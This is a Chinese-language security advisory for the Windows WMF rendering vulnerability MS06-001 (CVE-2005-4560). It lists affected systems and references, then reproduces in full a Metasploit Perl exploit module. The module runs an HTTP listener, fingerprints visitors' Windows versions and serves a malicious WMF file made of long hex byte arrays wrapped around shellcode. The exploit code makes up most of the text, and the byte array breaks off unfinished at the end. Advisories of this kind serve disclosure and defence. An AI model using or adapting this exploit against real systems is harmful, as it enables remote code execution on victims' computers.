安全研究
安全漏洞
Microsoft Windows图形渲染引擎WMF格式代码执行漏洞(MS06-001)
发布日期:2005-12-28
更新日期:2006-01-05
受影响系统:
Microsoft Windows XP SP2描述:
Microsoft Windows XP SP1
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
BUGTRAQ ID: 16074
CVE(CAN) ID: CVE-2005-4560
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows的WMF图形渲染引擎实现上存在远程代码执行漏洞。
如果用户受骗访问了恶意的WMF格式文件的话,则在引擎解析该文件时就会在用户系统上以用户权限执行任意代码。
<*来源:Daniel Bonekeeper (thehazard@gmail.com)
H D Moore (hdm@metasploit.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113579604018479&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=113579649211979&w=2
http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.us-cert.gov/cas/techalerts/TA05-362A.html
http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx
http://www.us-cert.gov/cas/techalerts/TA06-005A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::ie_xp_pfv_metafile;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
my $advanced =
{
};
my $info =
{
'Name' => 'Windows XP/2003 Picture and Fax Viewer Metafile Overflow',
'Version' => '$Revision: 1.2 $',
'Authors' =>
[
'H D Moore <hdm [at] metasploit.com'
],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a vulnerability in the Windows Picture and
Fax Viewer found in Windows XP and 2003. This vulnerability uses
a corrupt Windows Metafile to execute arbitrary code and was reported by
noemailpls[at]noemail.ziper to the Bugtraq mailing list after
being discovered in the wild at the following URL:
http://unionseek[DOT]com/d/t1/wmf_exp.htm
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winxp', 'win2003' ],
'Priv' => 0,
'UserOpts' =>
{
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
},
'Payload' =>
{
'Space' => 5081,
'Keys' => [ '-ws2ord', '-bind' ],
},
'Refs' =>
[
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic - Windows XP / Windows 2003' ]
],
'Keys' => [ 'ie' ],
'DisclosureDate' => 'Dec 27 2005',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
$self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . "/anything.wmf");
while (defined($client = $server->accept()))
{
$self->HandleHttpClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
sub HandleHttpClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $targetIdx = $self->GetVar('TARGET');
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $content;
my $rhost;
my $rport;
my $content;
my $targets =
{
"Windows XP" => [ ], # Automatic
"Windows 2003" => [ ], # Automatic
};
my $target;
my $os;
# Read the HTTP command
my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
# Read in the HTTP headers
while (my $line = $fd->RecvLine(10))
{
my ($var, $val) = split /: /, $line;
# Break out if we reach the end of the headers
last if (not defined($var) or not defined($val));
if ($var eq 'User-Agent')
{
$os = "Windows 2003" if (!$os and $val =~ /Windows NT 5.2/);
$os = "Windows XP" if (!$os and $val =~ /Windows NT 5.1/);
$os = "Windows 2000" if (!$os and $val =~ /Windows NT 5.0/);
$os = "Windows NT" if (!$os and $val =~ /Windows NT/);
$os = "Unknown" if (!$os);
}
}
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
$target = $targets->{$os};
if (! $target) {
$self->PrintLine("[*] Unsupported HTTP Client connected from $rhost:$rport using $os");
}
my $content = $self->wmf_head . $shellcode . $self->wmf_foot;
$self->PrintLine("[*] HTTP Client connected from $rhost:$rport using $os, sending payload...");
# Transmit the HTTP response
$fd->Send(
"HTTP/1.1 200 OK\r\n" .
"Content-Type: text/plain\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
"$content"
);
$fd->Close();
}
# Ripped straight from wmf_exp.wmf
sub wmf_head {
return
"\x01\x00\x09\x00\x00\x03\x52\x1f\x00\x00\x06\x00\x3d\x00\x00\x00".
"\x00\x00\x11\x00\x00\x00\x26\x06\x0f\x00\x18\x00\xff\xff\xff\xff".
"\xff\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x03\x85\x00".
"\xd0\x02\x00\x00\x09\x00\x00\x00\x26\x06\x0f\x00\x08\x00\xff\xff".
"\xff\xff\x02\x00\x00\x00\x17\x00\x00\x00\x26\x06\x0f\x00\x23\x00".
"\xff\xff\xff\xff\x04\x00\x1b\x00\x54\x4e\x50\x50\x14\x00\x20\x00".
"\xb8\x00\x32\x06\x00\x00\xff\xff\x4f\x00\x14\x00\x00\x00\x4d\x00".
"\x69\x00\x00\x00\x0a\x00\x00\x00\x26\x06\x0f\x00\x0a\x00\x54\x4e".
"\x50\x50\x00\x00\x02\x00\xf4\x03\x09\x00\x00\x00\x26\x06\x0f\x00".
"\x08\x00\xff\xff\xff\xff\x03\x00\x00\x00\x0f\x00\x00\x00\x26\x06".
"\x0f\x00\x14\x00\x54\x4e\x50\x50\x04\x00\x0c\x00\x01\x00\x00\x00".
"\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0b\x02\x00\x00".
"\x00\x00\x05\x00\x00\x00\x0c\x02\xd0\x02\xc0\x03\x04\x00\x00\x00".
"\x04\x01\x0d\x00\x07\x00\x00\x00\xfc\x02\x00\x00\x00\x00\x66\x00".
"\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x09\x00\x00\x00\xfa\x02".
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x22\x00\x04\x00\x00\x00".
"\x2d\x01\x01\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x09\x00\x00\x00".
"\x1d\x06\x21\x00\xf0\x00\xd0\x02\xc0\x03\x00\x00\x00\x00\x04\x00".
"\x00\x00\x2d\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff".
"\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00".
"\xf0\x01\x00\x00\x09\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x22\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x10\x00".
"\x00\x00\x26\x06\x0f\x00\x16\x00\xff\xff\xff\xff\x00\x00\x47\x00".
"\x00\x00\x8f\x02\x00\x00\x11\x01\x00\x00\xc1\x02\x00\x00\x08\x00".
"\x00\x00\x26\x06\x0f\x00\x06\x00\xff\xff\xff\xff\x01\x00\x0d\x00".
"\x00\x00\xfb\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x01\x17\x00\x00\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00".
"\x05\x00\x00\x00\x09\x02\x00\x00\x00\x02\x05\x00\x00\x00\x14\x02".
"\x00\x00\x00\x00\x04\x00\x00\x00\x02\x01\x02\x00\x10\x00\x00\x00".
"\x26\x06\x09\x00\x16\x00";
}
# Ripped straight from wmf_exp.wmf
sub wmf_foot {
return
"\x00\x09\x00\x04\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x15\x00\x00\x00\x32\x0a\xa5".
"\x01\x2a\x00\x09\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x20".
"\x00\x0a\xfb\x08\x00\x0a\x00\x06\x00\x09\x00\x09\x00\x07\x00\x09".
"\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x8a\x14\x02\x00\x00\x00\x00\x04\x70\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x01\x00\x19\x00\x00\x00\x32\x0a\xbb\x01\x2a".
"\x00\x0c\x00\x00\x00\x77\x77\x77\x77\x20\x3d\x20\x77\x77\x77\x77".
"\x77\x0c\x00\x0c\x00\x07\x00\x0c\x00\x05\x00\x0a\x00\x05\x00\x0c".
"\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00".
"\x00\x32\x0a\xbb\x01\xa3\x00\x01\x00\x00\x00\x2d\x00\x06\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x25\x00\x00\x00\x32\x0a\xbb\x01\xa9\x00\x14\x00\x00".
"\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x77\x77\x77\x77\x20\x05\x00\x0a\x00\x0a\x00\x05\x00\x0a\x00\x05".
"\x00\x06\x00\x0a\x00\x08\x00\x09\x00\x05\x00\x0a\x00\x08\x00\x0a".
"\x00\x06\x00\x09\x00\x05\x00\x0a\x00\x08\x00\x05\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
"\x00\x04\xbe\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x3d\x00\x00\x00\x32\x0a\xd1\x01\x2a\x00\x24\x00\x00\x00\x49".
"\x20\x77\x77\x77\x77\x77\x20\x42\x20\x3d\x20\x77\x77\x77\x77\x77".
"\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x20\x42\x20\x07\x00\x05\x00\x0b\x00\x0a\x00\x0a\x00\x0a\x00\x09".
"\x00\x05\x00\x0c\x00\x05\x00\x0b\x00\x05\x00\x05\x00\x0a\x00\x0a".
"\x00\x05\x00\x0a\x00\x05\x00\x06\x00\x0a\x00\x08\x00\x05\x00\x0a".
"\x00\x06\x00\x04\x00\x0e\x00\x0b\x00\x05\x00\x0a\x00\x0a\x00\x0a".
"\x00\x0a\x00\x0a\x00\x04\x00\x0d\x00\x05\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
"\x00\x00\x00\x32\x0a\xe8\x01\x2a\x00\x01\x00\x00\x00\x49\x00\x07".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x9f\x0a\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xe8\x01\x31\x00\x01".
"\x00\x00\x00\x2d\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
"\x00\x00\x00\x02\xb0\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
"\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
"\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x30\x00\x00\x00\x32".
"\x0a\xe8\x01\x37\x00\x1b\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77".
"\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x77\x77\x77\x20\x00\x0c\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x05".
"\x00\x0b\x00\x05\x00\x05\x00\x0a\x00\x0a\x00\x05\x00\x0a\x00\x05".
"\x00\x06\x00\x0a\x00\x08\x00\x05\x00\x0a\x00\x06\x00\x04\x00\x0c".
"\x00\x0c\x00\x07\x00\x0e\x00\x0d\x00\x05\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x32\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x24".
"\x00\x00\x00\x32\x0a\x06\x02\x2a\x00\x13\x00\x00\x00\x77\x77\x77".
"\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x20".
"\x00\x07\x22\x0d\x00\x0c\x00\x05\x00\x0b\x00\x05\x00\x05\x00\x0a".
"\x00\x0a\x00\x05\x00\x0a\x00\x05\x00\x06\x00\x0a\x00\x08\x00\x05".
"\xe9\x0a\x00\x06\x00\x05\x00\x04\x00\x00\x00\x2e\x7e\x01\x00\x04".
"\x00\x00\x00\x02\x01\x02\x00\x15\x00\x00\x00\xfb\x02\xe5\xff\x00".
"\x00\x00\x00\x00\x00\xbc\x02\x00\x00\x00\x00\x00\x40\x00\x00\x54".
"\x69\x6d\x65\x73\x20\x4e\x65\x77\x20\x52\x6f\x6d\x61\x6e\x00\x00".
"\x11\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x05".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x15\x00\x00\x00\x32\x0a\x06\x02\xbe\x00\x09".
"\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x0d\x00\x0f".
"\x00\x0e\x00\x0e\x00\x09\x00\x0d\x00\x0a\x00\x08\x00\x0a\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x15".
"\x00\x00\x00\xfb\x02\xed\xff\x00\x00\x00\x00\x00\x00\xbc\x02\x00".
"\x00\x00\x00\x00\x40\x00\x00\x54\x69\x6d\x65\x73\x20\x4e\x65\x77".
"\x20\x52\x6f\x6d\x61\x6e\x00\x00\x11\x04\x00\x00\x00\x2d\x01\x05".
"\x00\x08\x00\x00\x00\xf0\x01\x03\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x13\x00\x00".
"\x00\x32\x0a\x06\x02\x2d\x01\x08\x00\x00\x00\x77\x77\x77\x77\x77".
"\x77\x77\x20\x0a\x00\x08\x00\x0a\x00\x06\x00\x09\x00\x05\x00\x0a".
"\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x01\x00\x0f\x00\x00\x00\x32\x0a\x1e\x02\x2a".
"\x00\x05\x00\x00\x00\x77\x77\x77\x20\x3d\x00\x07\x00\x0e\x00\x0d".
"\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x83\x59\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\xc3\x18".
"\x00\x04\x00\x00\x00\x02\x57\x01\x00\x18\x00\x00\xf2\x32\x0a\x1e".
"\x02\x60\x00\x0b\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x77\x77\x00\x05\x00\x0a\x00\x06\x00\x09\x00\x08\x00\x05\x00\x09".
"\x00\x0a\x00\x0b\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00".
"\x00\x32\x0a\x1e\x02\xb8\x00\x01\x00\x00\x00\x2d\x00\x06\x00\x04".
"\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
"\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
"\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02".
"\x01\x01\x00\x10\x00\x00\x00\xcd\x0a\x1e\x02\xbe\x00\x06\x00\x00".
"\x00\x31\x20\x77\x77\x77\x77\x09\x00\x05\x00\x0a\x00\x09\x00\x06".
"\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x1e\x02\xef".
"\x00\x01\x00\x00\x00\x2d\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x22\x00\x00".
"\x00\x32\x0a\x1e\x02\xf4\x00\x12\x00\x00\x00\x77\x77\x77\x77\x77".
"\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x20\x08\x00\x0a".
"\x00\x0a\x00\x09\x00\x09\x00\x08\x00\x06\x00\x05\x00\x0a\x00\x0a".
"\x00\x05\x00\x09\x00\x0a\x00\x08\x00\x09\x00\x0f\x00\x09\x00\x05".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x1b\x00\x00\x00\x32\x0a\x34\x02\x2a\x00\x0d".
"\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x00\x07\x00\x0f\x00\x0c\x00\x04\x00\x0b\x00\x05\x00\x05\x00\x0a".
"\x00\x08\x00\x0a\x00\x05\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x87\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
"\x00\x00\x00\x32\x0a\x34\x02\x95\x00\x01\x00\x00\xe0\x2d\x00\x06".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x9f\x04\x00\x00\x00\x02\x01\x02".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\xc6\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x24\x00\x00\x00\x32\x0a\x34\x02\x9b\x00\x13".
"\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x77\x77\x77\x77\x77\x20\x00\x05\x00\x05\x00\x0b\x00\x09\x00\x04".
"\x00\x0a\x00\x08\x00\x09\x00\x0e\x00\x06\x00\x0a\x00\x05\x00\x06".
"\x00\x09\x00\x09\x00\x06\x00\xb8\x00\x08\x00\x05\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x12\x00\x00\x00\x32\x0a\x4b\x02\x2a\x00\x07\x00\x00\x00\x4a".
"\x4e\x4b\x20\x3d\x20\x63\x00\x0a\x00\x0e\x00\x0e\x00\x05\x00\x0a".
"\x00\x05\x00\x09\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x4b".
"\x02\x6d\x00\x01\x00\x00\x00\x2d\x00\x05\x00\x04\x00\x00\x00\x2e".
"\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
"\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
"\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x0f".
"\x00\x00\x00\x32\x0a\x4b\x02\x72\x00\x05\x00\x00\x00\x4a\x75\x6e".
"\x20\x4e\x00\x0a\x00\x0a\x00\x0a\x00\x05\x00\x0e\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x95\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x09\x00\x00\x00\x32\x0a\x4b\x02\xa3\x00\x01\x00\x00\x00\xe8".
"\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x7c\x00\x13\x00\x00\x00\x32\x0a\x4b\x02\xa9".
"\x00\x08\x00\x00\x00\x74\x65\x72\x6d\x69\x6e\x61\x6c\x06\x00\x09".
"\x00\x08\x00\x0f\x00\x05\x00\x0a\x00\x0a\x00\x05\x00\x04\x00\x00".
"\x00\xba\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\x07\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x10\x00\x00\x00\x32\x0a\x4b\x02\xf1\x00\x06\x00\x00\x00\x6b".
"\x69\x74\x61\x73\x65\x0b\x00\x05\x00\x0a\x00\x0a\x00\x07\x00\x09".
"\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
"\x00\x81\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32\x0a\x61\x02\x2a\x00\x06".
"\xef\x00\x00\x4d\x41\x50\x4b\x20\x3d\x12\x00\x0d\x00\x0c\x00\x0e".
"\x00\x05\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
"\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
"\x00\x04\x00\x00\x00\x02\x01\x01\x00\x12\x00\x00\x00\x32\x0a\x61".
"\x02\x78\x00\x07\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x0f".
"\x00\x05\x00\x06\x00\x09\x00\x0a\x00\x09\x00\x0a\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
"\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
"\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
"\x00\x09\x00\x00\x00\x32\x0a\x61\x02\xb8\x00\x01\x00\x00\x00\x2d".
"\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
"\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
"\x00\x00\x00\x02\x01\x01\x00\x21\x00\x00\x00\x32\x0a\x61\x02\xbe".
"\x00\x11\x00\x00\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77".
"\x77\x77\x77\x77\x77\x77\x00\x09\x00\x24\x00\x06\x00\x05\x00\x09".
"\x00\x0a\x00\x05\x00\x09\x00\x0a\x00\x05\x00\x0a\x00\x08\x00\x0a".
"\x00\x06\x00\x09\x00\x05\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01".
"\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
"\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x3c\x00\x04\x00\x00".
"\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x7e\x00".
"\x00\x32\x0a\x61\x02\x49\x01\x06\x00\x00\x00\x77\x77\x77\x77\x77".
"\x77\x0b\x00\x05\x00\x0a\x7e\x0a\x00\x07\x00\x09\x00\x04\x00\x00".
"\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x04\x00\x00".
"\x00\x02\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x04\x00\x04\x00\x00".
"\x00\x2d\x01\x01\x00\x07\x00\x00\x00\x1b\x04\x84\x02\x92\x03\x28".
"\x00\xc8\x01\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d".
"\x01\x00\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
"\x00\x14\x02\x00\x00\x00\x00\x15\x00\x00\x00\xfb\x02\xeb\xff\x00".
"\x00\x00\x00\x00\x00\xbc\x02\x00\x00\x00\x00\x00\x40\x00\x00\x54".
"\x69\x6d\x65\x73\x20\x4e\x65\x77\x20\x52\x6f\x6d\x61\x6e\x00\x00".
"\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x05".
"\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
"\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\xc1\x18\x00\x04\x00\x00".
"\x00\x02\x01\x01\x00\x1c\x00\x00\x00\x32\x0a\x42\x00\xd2\x01\x0e".
"\x00\x00\x00\x71\x71\x71\x20\x3d\x20\x71\x71\x71\x71\x2f\x71\x71".
"\x71\x13\x00\x0e\x00\x11\x00\x05\x00\x0d\x00\x06\x00\x13\x00\x0f".
